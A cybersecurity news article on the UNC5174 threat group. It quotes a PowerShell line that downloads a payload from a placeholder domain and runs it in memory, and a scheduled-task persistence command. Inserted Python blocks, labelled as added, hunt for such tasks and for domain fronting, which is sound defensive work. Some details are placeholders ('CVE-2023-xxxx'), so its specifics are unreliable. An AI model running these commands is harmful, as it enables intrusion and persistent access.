Chinese UNC5174 Actors Added New Open Source Tool & C2 Infrastructure to Their Arsenal

Cybersecurity researchers have uncovered a significant evolution in the tactics of the Chinese threat group UNC5174, which has incorporated a new open-source tool and command-and-control (C2) infrastructure into their malicious operations.

The group, known for targeting government institutions and critical infrastructure across Southeast Asia and North America, has expanded their arsenal with a modified version of an open-source remote access tool that enables persistent access to compromised networks while evading traditional detection methods.

This development represents a concerning advancement in the group’s technical capabilities and operational sophistication.


UNC5174, active since at least 2018, has historically utilized custom malware and legitimate tools for their operations.

However, this latest campaign marks a strategic shift toward leveraging and modifying publicly available tools, a trend increasingly observed among sophisticated threat actors seeking to blend their activities with legitimate network traffic.

The group’s recent attacks have primarily targeted organizations in the telecommunications, defense, and energy sectors, with initial access typically gained through spear-phishing emails containing malicious Microsoft Office documents or exploiting unpatched public-facing applications.

Sysdig researchers identified the malware during routine threat hunting operations, noting that the group had implemented several novel obfuscation techniques designed to bypass modern endpoint protection platforms.

Analysis of the malware samples revealed UNC5174 had established a robust infrastructure including multiple redundant C2 servers across Eastern Europe and Southeast Asia, significantly expanding their operational resilience compared to previous campaigns.

The impact of these attacks has been substantial, with several organizations reporting data exfiltration and persistent unauthorized access lasting weeks before detection.

Security teams have observed the threat actors moving laterally through networks, harvesting credentials, and establishing multiple persistence mechanisms to ensure continued access even after initial remediation efforts.

This sophisticated approach highlights UNC5174’s focus on long-term intelligence gathering rather than immediate disruptive operations.

Infection Mechanism Analysis

The infection chain begins with a spear-phishing email containing a weaponized Microsoft Excel document that exploits the CVE-2023-xxxx vulnerability.

When opened, the document executes a series of PowerShell commands that establish an initial foothold on the victim’s system:

$data = (New-Object System.Net.WebClient).DownloadData("hxxps://legitimate-looking-domain.com/resources/document.dat");
$decompressed = [System.IO.Compression.GzipStream]::new([System.IO.MemoryStream]::new($data), [System.IO.Compression.CompressionMode]::Decompress).ReadToEnd();
Invoke-Expression $decompressed

Initial Infection Chain (Source – sysdig)

This PowerShell script downloads an obfuscated payload, which is then decompressed and executed directly in memory, leaving minimal traces on disk.

The deobfuscated payload establishes persistence through a scheduled task masquerading as a legitimate Windows update process:

schtasks /create /tn "WindowsUpdate\ServiceCheck" /tr "powershell.exe -WindowStyle hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAg..." /sc daily /st 09:15 /f
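A defender-side hunt for the persistence pattern just described, added here as an example and not taken from the article or from Sysdig's research. It assumes the input is a list of (task name, action command line) pairs as you would export from the Task Scheduler or from task-creation audit events, and all sample registrations are constructed for the demonstration. It decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE), then flags the combination of an update-themed task name outside the real \Microsoft\Windows\ tree, a hidden PowerShell window, and a download-and-execute pattern in the command.

```python
import base64
import re
from typing import Optional

# Indicators drawn from the persistence mechanism described above: a PowerShell
# scheduled task with a hidden window and a base64 -EncodedCommand, registered
# under an update-themed name outside the real \Microsoft\Windows\ task tree.
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(?:DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b)"
)
UPDATE_THEMED = re.compile(r"(?i)windows\s*update|wuauclt|defender|onedrive")
MICROSOFT_TREE = "\\microsoft\\windows\\"


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(action: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument in a task action, or None."""
    m = ENCODED_SWITCH.search(action)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def task_indicators(name: str, action: str) -> list:
    """List the suspicious traits of one scheduled task (empty list means nothing flagged)."""
    hits = []
    path = "\\" + name.lower().lstrip("\\")
    if UPDATE_THEMED.search(name) and not path.startswith(MICROSOFT_TREE):
        hits.append("update-themed task name outside \\Microsoft\\Windows\\")
    if "powershell" in action.lower() and HIDDEN_WINDOW.search(action):
        hits.append("powershell with hidden window")
    decoded = decode_encoded_command(action)
    if decoded is not None:
        hits.append("encoded command")
        if DOWNLOAD_CRADLE.search(decoded):
            hits.append("download/in-memory execution inside encoded command")
    elif DOWNLOAD_CRADLE.search(action):
        hits.append("download/in-memory execution in plain command line")
    return hits


def hunt(tasks) -> dict:
    """Map each flagged task name to its indicator list; clean tasks are omitted."""
    findings = {}
    for name, action in tasks:
        hits = task_indicators(name, action)
        if hits:
            findings[name] = hits
    return findings


# Constructed sample registrations (name, action), not taken from the page.
SAMPLE_TASKS = [
    ("\\WindowsUpdate\\ServiceCheck",
     "powershell.exe -WindowStyle hidden -enc "
     + encode_ps("$s=New-Object Net.WebClient; Invoke-Expression $s.DownloadString('https://example.invalid/d')")),
    ("\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start", "%windir%\\system32\\sc.exe start wuauserv"),
    ("\\Backup\\Nightly", "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
    ("\\OneDriveSync", "powershell.exe -w hidden -c \"iex (iwr https://example.invalid/p)\""),
]

if __name__ == "__main__":
    for task, hits in hunt(SAMPLE_TASKS).items():
        print(task, "->", "; ".join(hits))
```

The genuine Windows Update task in the sample is left alone because it lives under \Microsoft\Windows\ and runs no PowerShell, while the two look-alikes are flagged on several independent traits; in practice the same checks can be fed from Security event 4698 (task created) or from a periodic Get-ScheduledTask export.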

The malware then beacons to its C2 infrastructure using HTTPS communications that mimic legitimate web browsing patterns (Figure 2: C2 Communication Pattern).

The C2 servers employ domain fronting techniques, routing traffic through trusted cloud services to evade network-based detection systems.
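Domain fronting works because the TLS Server Name Indication (SNI) names a trusted host while the HTTP Host header inside the encrypted session names the real destination; a network sensor that only sees the ClientHello therefore sees nothing wrong. The check below is an added example, not part of the article or Sysdig's analysis, and it assumes a TLS-inspecting proxy that records both the SNI and the decrypted Host header per flow (the sample records are constructed). Without TLS inspection the Host header is unavailable and this comparison cannot be made, which is exactly why the technique evades network-based detection.

```python
# Constructed records from a TLS-inspecting proxy (not from the page): the SNI
# sent in the ClientHello and the Host header found in the decrypted request.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "sni": "cdn.example-cloud.net", "host": "cdn.example-cloud.net"},
    # Sub-host rotation inside one registrable domain is normal for CDNs and must not alert.
    {"src": "10.0.0.7", "sni": "assets.example-cloud.net", "host": "a1b2c3.example-cloud.net:443"},
    # SNI names a trusted service, Host names an unrelated domain: the fronting signature.
    {"src": "10.0.0.9", "sni": "www.trusted-service.example", "host": "update-check.c2-placeholder.example"},
    # No Host header (e.g. HTTP/1.0): nothing to compare, so it is not flagged here.
    {"src": "10.0.0.9", "sni": "www.trusted-service.example", "host": ""},
]


def registered_domain(hostname: str) -> str:
    """Approximate the registrable domain as the last two DNS labels.

    Assumption: no public-suffix list is available. Names under multi-label
    suffixes such as example.co.uk need a real suffix list to compare correctly.
    """
    bare = hostname.lower().split(":")[0].rstrip(".")
    labels = bare.split(".")
    return ".".join(labels[-2:])


def is_fronted(flow: dict) -> bool:
    """True when the Host header names a different registrable domain than the SNI."""
    host = flow.get("host", "")
    if not host:
        return False
    return registered_domain(flow["sni"]) != registered_domain(host)


def find_fronting(flows) -> list:
    """Return the flows whose SNI and Host disagree at the registrable-domain level."""
    return [f for f in flows if is_fronted(f)]


if __name__ == "__main__":
    for flow in find_fronting(SAMPLE_FLOWS):
        print(f"{flow['src']}: SNI {flow['sni']} but Host {flow['host']}")
```

Comparing at the registrable-domain level rather than exact hostnames keeps ordinary CDN behaviour from alerting; flows that carry no Host header at all are a separate, lower-confidence signal worth counting rather than treating as fronting.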

The malware utilizes a modified version of the open-source Sliver framework, which has been customized with additional modules for credential harvesting, keylogging, and screen capture capabilities.

Most notably, UNC5174 has implemented a novel anti-analysis feature that detects virtualized environments by measuring subtle timing differences in CPU operations, allowing it to remain dormant when under analysis in security sandboxes.

This sophisticated evasion technique, combined with the group’s expanded infrastructure, presents significant challenges for defenders attempting to identify and mitigate this threat.


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.